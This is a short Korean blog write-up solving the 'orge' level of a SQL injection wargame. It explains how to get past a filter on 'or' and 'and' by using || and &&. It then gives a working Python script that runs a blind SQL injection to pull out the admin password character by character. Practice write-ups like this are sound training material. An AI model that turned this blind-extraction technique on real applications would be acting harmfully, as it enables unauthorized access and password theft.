반응형
https://los.rubiya.kr/gate.php
[문제]
[풀이]
or, and를 필터링하고
pw를 입력받는다.
쿼리 실행 결과 id가 있다면 Hello id를 출력한다.
이후 입력받은 pw를 addslashes 시킨다.
똑같은 쿼리에 넣고
쿼리 실행 결과 pw와 addslashes된 입력받은 pw가 같다면 문제가 풀린다.
level 4 orc 문제와 푸는 방식이 똑같은 문제이다.
orc 문제 : https://devhacks.tistory.com/180
or, and만 ||, &&로 바꿔주면 된다.
문제 길이는 8이고
똑같이 python코드를 작성하여 패스워드를 알아낸다.
import requests
url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php'
cookie = {
'PHPSESSID': 'aaaa'
}
pw = ''
for i in range(1, 9):
for j in range(33, 128):
print(i, j)
res = requests.get(url+f'?pw=%27||id=%27admin%27%26%26ascii(substring(pw,{i},1))={j}%20--%20', cookies=cookie)
if('Hello admin' in res.text):
pw+=chr(j)
print(pw)
break
print('pw: ' + pw)
코드를 실행하면
패스워드를 알아낼 수 있다.
문제가 풀린다.
반응형